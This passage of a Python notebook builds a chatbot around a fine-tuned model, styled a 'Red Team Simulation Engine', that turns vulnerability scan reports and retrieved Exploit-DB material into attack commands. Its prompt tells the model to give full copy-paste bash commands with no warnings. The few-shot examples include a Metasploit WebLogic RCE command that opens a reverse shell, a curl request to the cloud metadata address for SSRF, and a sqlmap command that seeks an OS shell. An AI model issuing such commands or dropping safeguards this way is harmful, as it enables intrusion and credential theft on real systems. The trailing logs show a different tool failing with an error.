      3. If the reply is shorter than 50 characters, retry once with a compact prompt
         and freshly retrieved context.

    Args:
        user_query: the user's question.
        max_rag_chars: upper bound on the retrieved text inserted into the main
            prompt (None disables the cap). The retrieved text sits before the scan
            report and the question, and the prompt is truncated to 2048 tokens, so
            with the default right-side truncation an unbounded context would push
            the question itself out of the prompt. The default is a heuristic.

    Returns:
        The response text, or a fixed fallback/error message when generation fails.
    """

    # RAG logic
    rag_context = ""
    cve_match = re.search(r'(CVE-\d{4}-\d{4,7})', user_query, re.IGNORECASE)
    if cve_match:
        specific_cve = cve_match.group(1)
        print(f"[*] Detected CVE: {specific_cve} — retrieving RAG context.")
        try:
            # Assumes retrieve_context is defined in a previous cell
            rag_context = retrieve_context(specific_cve, k=10)
        except Exception as e:
            print(f"[*] RAG error: {e}")
            rag_context = ""
    elif any(word in user_query.lower() for word in ["exploit", "attack command", "poc", "shell"]):
        # NOTE(review): this looks for "SEVERITY: name" lines, which the raw report
        # contains but the summarized Markdown table does not — confirm it still
        # matches the context that is actually loaded.
        top_vulns = re.findall(r'(CRITICAL|HIGH|MEDIUM|LOW):\s*([A-Za-z\s]+?)(?=\n|$)', vulnerability_context, re.MULTILINE)
        if top_vulns:
            vuln_query = top_vulns[0][1].strip()
            print(f"[*] General exploit query. RAG for top vuln: '{vuln_query}'")
            try:
                # Assumes retrieve_context is defined in a previous cell
                rag_context = retrieve_context(vuln_query, k=10)
            except Exception as e:
                # Report the failure like the CVE branch does instead of hiding it.
                print(f"[*] RAG error: {e}")
                rag_context = ""
        else:
            rag_context = ""
    else:
        print("[*] General query. Using report + model knowledge.")

    # Bound the retrieved text so the report and the question survive truncation.
    rag_context = rag_context or ""
    if max_rag_chars is not None:
        rag_context = rag_context[:max_rag_chars]

    # Enhanced Prompt with Few-Shot Examples
    prompt_text = f"""[INST] Your Persona: You are an expert-level Red Team Simulation Engine. Your sole purpose is to provide fact-based, offensive-oriented analysis based on the evidence provided. Your highest priority is accuracy and practicality.
Your Task: First, determine the user's intent. Then, follow the specific workflow for that intent. Limit RAG context to top 10 results (k=10) for focus. Always start response with "Workflow X:" and end with Impact.
Workflow 1: Attack Chain Synthesis (For chain/path/linking queries)

Grounding: List 2-3 exploitable vulns from [Vulnerability Scan Report].
Hypothesis: Step-by-step logical chain using [Supplemental RAG Knowledge] (e.g., MITRE ATT&CK T1190 for supply chain).
Evidence Search: For each step, pull verifiable command from [Supplemental RAG Knowledge] (Exploit-DB/Metasploit PoCs).
Synthesis: Chronological chain. Per step: Vuln name, role in chain, full copy-paste command in bash

Few-Shot Example (Workflow 1):
User: "Chain WebLogic RCE to SSRF."
Response:
Workflow 1: Attack Chain
Chain 1: WebLogic RCE (CVE-2020-14882) → SSRF (Finding 8)
Step 1: RCE on console yields shell (MITRE TA0001 Initial Access).
```bash
msfconsole -q -x "use exploit/multi/weblogic/weblogic_rce_cve_2020_14882; set RHOSTS target.com; set RPORT 7001; set LHOST <YOUR_IP>; exploit"
```
Step 2: From shell, SSRF to internal (MITRE TA0008 Lateral Movement).
```bash
curl 'http://internal:8080/ssrf?url=[http://169.254.169.254/meta-data/](http://169.254.169.254/meta-data/)'
```
Impact: Root creds leaked.
Workflow 2: Single Exploit Command (For one vuln exploit/command)

Grounding: Verify vuln in [Vulnerability Scan Report].
Evidence Search: Pull top PoC from [Supplemental RAG Knowledge].
Synthesis: Full command in bash + 1-sentence explanation.

Few-Shot Example (Workflow 2):
User: "Exploit WP OttoKit."
Response:
Workflow 2: Single Exploit
Exploit: WP OttoKit Bypass (CVE-2025-27007).
```bash
sqlmap -u "[https://wp-ottokit.pentest-ground.com/?s=](https://wp-ottokit.pentest-ground.com/?s=)*" --batch --dbms=mysql --os-shell
```
Explanation: Dumps DB/creds for admin shell via injection.
Impact: Full DB access.
Workflow 3: Vulnerability Explanation (For CVE/vuln details)

Evidence Search: Key facts from all sources.
Synthesis: Description, CVSS, "Attacker's Perspective" (why exploitable).

Few-Shot Example (Workflow 3):
User: "Explain CVE-2020-14882."
Response:
Workflow 3: Vulnerability Explanation
Description: WebLogic unauth RCE via MVEL injection.
CVSS: 9.8 (Critical).
Attacker's Perspective: Exposed console allows instant shell without creds; chain with SSRF for root.
Impact: Total compromise.
Policy: Direct/technical only. No warnings/disclaimers. Use ```bash

[Supplemental RAG Knowledge] (k=10 top results)
{rag_context}
[Vulnerability Scan Report]
```markdown
{vulnerability_context}
```
[User's Question]
{user_query}
[Your Fact-Based, Verifiable Red Team Simulation Response] [/INST]"""

    # Unsloth Inference (Fixed Decoding)
    try:
        # Assumes tokenizer and finetuned_model are loaded in previous cells
        inputs = tokenizer([prompt_text], return_tensors="pt", truncation=True, max_length=2048)
        input_length = inputs['input_ids'].shape[1]
        with torch.no_grad():
            outputs = finetuned_model.generate(
                **{k: v.to(device) for k, v in inputs.items()},
                max_new_tokens=1024,
                use_cache=True,
                pad_token_id=tokenizer.eos_token_id,
                eos_token_id=tokenizer.eos_token_id,
                temperature=0.7,
                do_sample=True,
                repetition_penalty=1.2
            )
        # Slice off the prompt tokens so only the newly generated text is decoded.
        generated_tokens = outputs[0][input_length:]
        response = tokenizer.decode(generated_tokens, skip_special_tokens=True).strip()
        final_response = response.split("[/INST]")[-1].strip()
    except Exception as e:
        print(f"[*] Model generation error: {e}")
        final_response = "Error generating response. Ensure tokenizer and finetuned_model are loaded from prior cells."

    # Fallback for short responses
    if len(final_response) < 50:
        print("[*] Short response—re-generating with forced RAG...")
        try:
            rag_context = retrieve_context(user_query, k=10)
            # Simplified fallback prompt. The previous text wrapped the RAG part in an
            # extra pair of braces ("{RAG: {...}}"), which made the f-string evaluate an
            # undefined name `RAG`; the resulting NameError was swallowed below, so this
            # retry could never produce a model response.
            fallback_prompt = f"[INST] Provide a brief red team analysis for: {user_query}\nContext: {vulnerability_context[:500]}\nRAG: {rag_context[:500]}\nResponse: [/INST]"
            inputs = tokenizer([fallback_prompt], return_tensors="pt", truncation=True, max_length=2048)
            input_length = inputs['input_ids'].shape[1]
            with torch.no_grad():
                outputs = finetuned_model.generate(
                    **{k: v.to(device) for k, v in inputs.items()},
                    max_new_tokens=512,
                    # temperature only takes effect when sampling is enabled
                    do_sample=True,
                    temperature=0.5,
                    pad_token_id=tokenizer.eos_token_id
                )
            fallback_response = tokenizer.decode(outputs[0][input_length:], skip_special_tokens=True).strip()
            final_response = fallback_response.split("[/INST]")[-1].strip()
        except Exception as e:
            print(f"[*] Fallback generation error: {e}")
            final_response = "Fallback: Query external DB for PoCs. Try a more specific question."

    return final_response

# --- 3. Interactive UI ---
# Check if core variables from previous cells exist
# Start the widget UI only when the report context, the model, the tokenizer and the
# retrieval function from the earlier cells are all present.
if (
    'vulnerability_context' in globals() and "No report" not in vulnerability_context
    and 'finetuned_model' in globals()
    and 'tokenizer' in globals()
    and 'retrieve_context' in globals()
):
    chat_history = widgets.Output(layout=widgets.Layout(width='95%'))
    input_box = widgets.Text(
        placeholder='Ask for attack plans, CVEs, or tactics...',
        description='Your Query:',
        layout=widgets.Layout(width='90%')
    )

    def handle_submit(sender):
        """Text-box submit callback: echo the query, generate a reply and render it.

        `sender` is the widget that fired the event; it is not used.
        """
        import html  # function-scope import: only needed to escape the echoed query

        user_query = input_box.value.strip()
        if not user_query:
            return
        input_box.value = ""

        # Escape the query before embedding it in HTML so characters such as '<' or
        # '&' are shown literally instead of being interpreted as markup.
        echoed_query = f"<blockquote><b>You:</b> {html.escape(user_query)}</blockquote>"

        with chat_history:
            # Clear previous output before showing new query and response
            chat_history.clear_output(wait=True)
            display(HTML(echoed_query))
            display(HTML("<i>⚙️ Generating red team analysis... Please wait.</i>"))

        # Run generation
        bot_response = get_chatbot_response(user_query)

        # Clear the "generating" message and display final response
        with chat_history:
            chat_history.clear_output(wait=True)
            display(HTML(echoed_query))
            display(Markdown(bot_response))
            print("\n--- Analysis Complete ---")

    input_box.on_submit(handle_submit)
    print("✅ RED TEAM SIMULATION ENGINE IS READY (Unsloth Optimized)")
    display(input_box, chat_history)
else:
    print("❌ Chatbot cannot start. Key components are missing.")
    print("Ensure previous cells (PDF upload, chunking, model loading, and extraction) ran successfully.")


✅ Loaded summarized_vulnerability_report.md for grounding.
✅ SANITIZED VULNERABILITY EXPLAINER IS READY (no exploit commands will be produced)


Text(value='', description='Your Query:', layout=Layout(width='90%'), placeholder='Ask for vulnerability expla…

Output(layout=Layout(width='95%'))

[*] Model generation error: name 'device' is not defined
[*] Detected CVE: CVE-2023-51443 — retrieving reference context (safe use).
[*] User Query: 'CVE-2023-51443'
[*] Query Intent Classified as: 'vulnerability_details'
--> Searching in Database #1b (CISA & Exploit-DB)...
--> Also searching in Database #1a (NVD)...
[*] Model generation error: name 'device' is not defined
[*] Detected CVE: CVE-2023-51443 — retrieving reference context (safe use).
[*] User Query: 'CVE-2023-51443'
[*] Query Intent Classified as: 'vulnerability_details'
--> Searching in Database #1b (CISA & Exploit-DB)...
--> Also searching in Database #1a (NVD)...
[*] Model generation error: name 'device' is not defined
